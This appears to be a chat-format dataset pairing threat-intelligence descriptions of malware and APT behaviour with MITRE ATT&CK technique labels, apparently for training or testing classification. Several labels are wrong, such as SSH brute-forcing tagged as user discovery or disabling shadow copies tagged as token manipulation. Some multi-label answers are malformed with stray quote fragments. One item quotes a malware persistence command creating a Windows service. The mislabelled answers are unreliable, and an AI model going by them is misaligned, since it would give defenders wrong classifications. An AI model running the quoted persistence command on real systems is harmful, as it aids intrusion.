- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Get2 has the ability to identify the current username of an infected host."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "opens the Windows Firewall to modify incoming connections."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RegDuke can store its encryption key in the Registry."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacMa has used a custom JSON-based protocol for its C&C communications."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Astaroth uses WMIC to execute payloads."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This data is gathered into an information structure which the RAT zips with an 8 bytes random generated password, which is then XORed with one byte"
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used the Plink utility to tunnel RDP back to C2 infrastructure."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used filenames and Registry key names associated with Windows Defender."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER compromised three Japanese websites using a Flash exploit to perform watering hole attacks."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROKRAT can gather the hostname and the OS version to ensure it doesn’t run on a Windows XP or Windows Server 2003 systems."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has conducted SQL injection attacks, exploited vulnerabilities CVE-2019-19781 and CVE-2020-0688 for Citrix and MS Exchange, and CVE-2018-13379 for Fortinet VPNs."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gorgon Group malware can use process hollowing to inject one of its trojans into another process."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla and its RPC backdoors have used APIs calls for various tasks related to subverting AMSI and accessing then executing commands through RPC and/or named pipes."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StrifeWater can self delete to cover its tracks."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Temporary audio and video files are stored within the audio and video sub-folders respectively. After a call is finished, this data is compressed and encrypted using the same techniques previously witnessed. These files are stored in randomly named .dat files within the Skype folder"
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture', 'T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Chrome extension is installed and maintained by a number of plist files written to the user directory ~/Library/LaunchAgent/. To conceal the malicious behavior, the underlying commands in the plist files are obfuscated with Base64 encoding."
- },
- {
- "role": "assistant",
- "content": "T1647 - Plist File Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has conducted research against potential victim websites as part of its operational planning."
- },
- {
- "role": "assistant",
- "content": "T1594 - Search Victim-Owned Websites"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to add its own account to the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1136 - Create Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Many strings in are obfuscated with a XOR algorithm."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rising Sun can clear a memory blog in the process by overwriting it with junk bytes."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ferocious Kitten has acquired domains imitating legitimate sites."
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ursnif has used hooked APIs to take screenshots."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remsec is capable of listing contents of folders on the victim. Remsec also searches for custom network encryption software on victims."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Neoichor can upload files from a victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware’s second functionality is to gain persistence on an infected machine. After obtaining persistence, the next functionality of Linux Rabbit is to brute force SSH passwords which ultimately allows the malware to install the cryptocurrency miner onto the server. The SSH brute forcing begins by the malware first generating a random IPv4 string and checking its geolocation to see where it is located. If the IP is located within a country that is “blacklisted,” it will stop and move on until it finds an IP that is located in an allowed geolocation, which for this malware are Russia, South Korea, the UK, and the US. Once an allowed IP location is discovered, Linux Rabbit will check to see if an SSH server is listening on Port 22. The malware will open a socket to see if it receives a response, and if it does, it will attempt to obtain the machine’s hostname. If the TLD is not blacklisted, the malware will run through a process of authentication utilizing a list of hard-coded credentials it has"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has encoded payloads with a single-byte XOR, both skipping the key itself and zeroing in an attempt to avoid exposing the key."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Traditional antivirus software and other systems that rely on low-level indicators do not effectively detect and block common and pervasive malware"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emotet has been seen exploiting SMB via a vulnerability exploit like EternalBlue (MS17-010) to achieve lateral movement and propagation."
- },
- {
- "role": "assistant",
- "content": "T1210 - Exploitation of Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkWatchman has used a DGA to generate a domain name for C2."
- },
- {
- "role": "assistant",
- "content": "T1568.002 - Domain Generation Algorithms"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "bypasses user access control by using a DLL hijacking vulnerability in the Windows Update Standalone Installer (wusa.exe)."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ServHelper contains a module for downloading and executing DLLs that leverages \"rundll32.exe\"."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In order to avoid in-memory scanning during runtime, the payload encrypts all of the function blocks before executing the actual malicious routine. Afterwards, whenever it needs to use a function, it will decrypt the function, execute it, and encrypt the function back again, as can be seen in Figure 4. If a function will not be used on the rest of the execution, it will be scrambled by another mess-up function, as illustrated in Figure 6. The mess-up function muddles up the bytes with random values and makes the input blocks unrecoverable. The purpose of this is to further avoid being detected by a certain cybersecurity solution"
- },
- {
- "role": "assistant",
- "content": "T1027.005 - Indicator Removal from Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remexi is a basic back door Trojan that allows attackers to open a remote shell on the computer and execute commands"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWERTON has used AES for encrypting C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Trojan.Karagany has used plugins with a self-delete capability."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors developed their own custom webshells to upload to compromised servers."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After opening the doc file (which is again a Web Archive File), the exploit drops and executes the Trojan program “svcmondr.exe” (8052234dcd41a7d619acb0ec9636be0b)."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rising Sun can archive data using RC4 encryption and Base64 encoding prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560.003 - Archive via Custom Method"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In their example, the OilRig group used a malicious macro document to deliver the backdoor, which is a tactic much more commonly used by them. A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation. Invoke-Obfuscation has proven to be highly effective at obfuscating PowerShell scripts and in this case, the adversary was able to take advantage of the tool for increased chances of evasion and as an anti-analysis tactic. Based on our telemetry, we have high confidence the email account used to launch this attack was compromised by the OilRig group, likely via credential theft. The file appears to have been compiled using a bat2exe tool, which will take batch files (.bat) and convert them to PE (.exe) files. Its sole purpose here is to install the QUADAGENT backdoor and execute it. The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it. Once the QUADAGENT payload has executed, it will use rdppath[.]com as the C2, first via HTTPS, then HTTP, then via DNS tunneling, each being used as a corresponding fallback channel if the former fails. The wave against the government entity (June 26) also involved a simple PE file attachment (SHA256: d948d5b3702e140ef5b9247d26797b6dcdfe4fdb6f367bb217bc6b5fc79df520) using the filename tafahom.exe. This PE was slightly different from the other attack, being compiled using the Microsoft .NET Framework instead of being generated via a bat2exe tool and containing a decoy dialog box as shown in Figure 1"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mustang Panda has used RAR to create password-protected archives of collected documents prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We have identified several implants that leveraged PowerShell, VBS, JS, and dotnet for resilience and persistence. The final stage, however, is a dotnet application that takes several commands such as directory listing, screenshot, compress, upload, etc. It then creates random long string folder names in temp directories to host the collected files per category before compressing, encrypting and uploading to the C2 server"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can enumerate drives and Remote Desktop sessions."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As a result of all of the above actions, when attempting to surf the web, the user’s web browser will first ask the attacker web page on TOR for proxy settings. The user traffic is then redirected through a proxy controlled by the attacker, who carries out a Man-In-the-Middle attack and impersonates the various sites the user attempts to surf. The attacker is free to read the victim’s traffic and tamper with it in any way they please"
- },
- {
- "role": "assistant",
- "content": "T1557 - Adversary-in-the-Middle"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The same situation applies to authentication by key pair – the server contains a pre-defined constant public key and it allows authentication only if a particular private key is used"
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pupy can obtain a list of SIDs and provide the option for selecting process tokens to impersonate."
- },
- {
- "role": "assistant",
- "content": "T1134.001 - Access Token Manipulation: Token Impersonation/Theft"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has used PowerShell profiles to maintain persistence on an infected machine."
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As with every communication with the C2, the script collects and sends information about the target environment including the stack of security solutions installed on the computer and are part of the following list"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mongall can inject a DLL into `rundll32.exe` for execution."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY can search for modifiable services that could be used for privilege escalation."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has collected information from Microsoft SharePoint services within target networks."
- },
- {
- "role": "assistant",
- "content": "T1213.002 - Sharepoint"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Dust Storm, the threat actors executed JavaScript code via `mshta.exe`."
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla RPC backdoors can collect files from USB thumb drives."
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Apart for its backdoor routines, this malware can steal information through keylogging, audio recording, and screen capture"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture', 'T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has used various types of scripting to perform operations, including Python scripts. The group was observed installing Python 2.7 on a victim."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to execute the command ipconfig /all."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In order to discover potential targets and locate the information it needs to authenticate against, the script passively collects data from /.ssh/config, .bash_history, /.ssh/known_hosts, and the likes. We did not identify any active scanning techniques used to identify additional targets"
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nebulae can create a service to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conficker will copy itself with a random name into the system directory %systemroot%\\system32 and register itself as a service"
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot has arguably been one of the most popular Trojans for the past couple of years, used by threat actors mostly because of its modular design and highly resilient infrastructure. Bitdefender researchers even analyzed one of its modules earlier this year, particularly because it targeted telecom, education, and financial services in the US and Hong Kong"
- },
- {
- "role": "assistant",
- "content": "T1090.002 - External Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can modify service configurations."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Something that makes Kobalos unique is the fact that the code for running a C&C server is in Kobalos itself. Any server compromised by Kobalos can be turned into a C&C server by the operators sending a single command. As the C&C server IP addresses and ports are hardcoded into the executable, the operators can then generate new Kobalos samples that use this new C&C server"
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wingbird performs multiple process injections to hijack system processes and execute malicious code."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UEFI bootkits are planted in the system firmware and are invisible to security software running within the operating system because the malware loads in the initial stage of the booting sequence."
- },
- {
- "role": "assistant",
- "content": "T1542.001 - Pre-OS Boot: System Firmware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PingPull has the ability to install itself as a service."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete has scanned and looked for cryptographic keys and certificate file extensions."
- },
- {
- "role": "assistant",
- "content": "T1552.004 - Unsecured Credentials: Private Keys"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conti can discover files on a local system."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "STARWHALE has the ability to create the following Windows service to establish persistence on an infected host: `sc create Windowscarpstss binpath= \"cmd.exe /c cscript.exe c:\\\\windows\\\\system32\\\\w7_1.wsf humpback_whale\" start= \"auto\" obj= \"LocalSystem\"`."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After the driver is loaded, the VSS service is disabled using the Control Service Manager. Following this, a number of additional threads are created. A thread is created to handle the system reboot. It will sleep for the time specified by a command line parameter of 35 minutes, at which point the system will be restarted by an API call to InitializeSystemShutdownExW"
- },
- {
- "role": "assistant",
- "content": "T1134 - Access Token Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Winnti for Linux has used a modified copy of the open-source userland rootkit Azazel, named libxselinux.so, to hide the malware's operations and network activity."
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "From the attacks observed by Volexity, what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks. Volexity has also found that, in addition to sending malware lures, the Patchwork threat actors are leveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages. This domain was not only used to send the phishing e-mails, but also to track which targets opened the e-mail. Within each of the HTML-formatted messages, an embedded image tag is used to beacon home to the attacker's domain, containing an unique identifier specific to the recipient. While the use of e-mail recipient tracking, a linked RTF document, and a final payload (QuasarRAT variant) remained the same, certain elements differed across campaigns observed. Exploitation and Malware Execution . Upon opening the above attachments, the recipient will be presented with a document that is a direct copy of a blog post or report released by the think tank organization being impersonated. Its called the \"packager trick\" because any file embedded in an RTF file using packager will be automatically dropped to the %tmp% folder 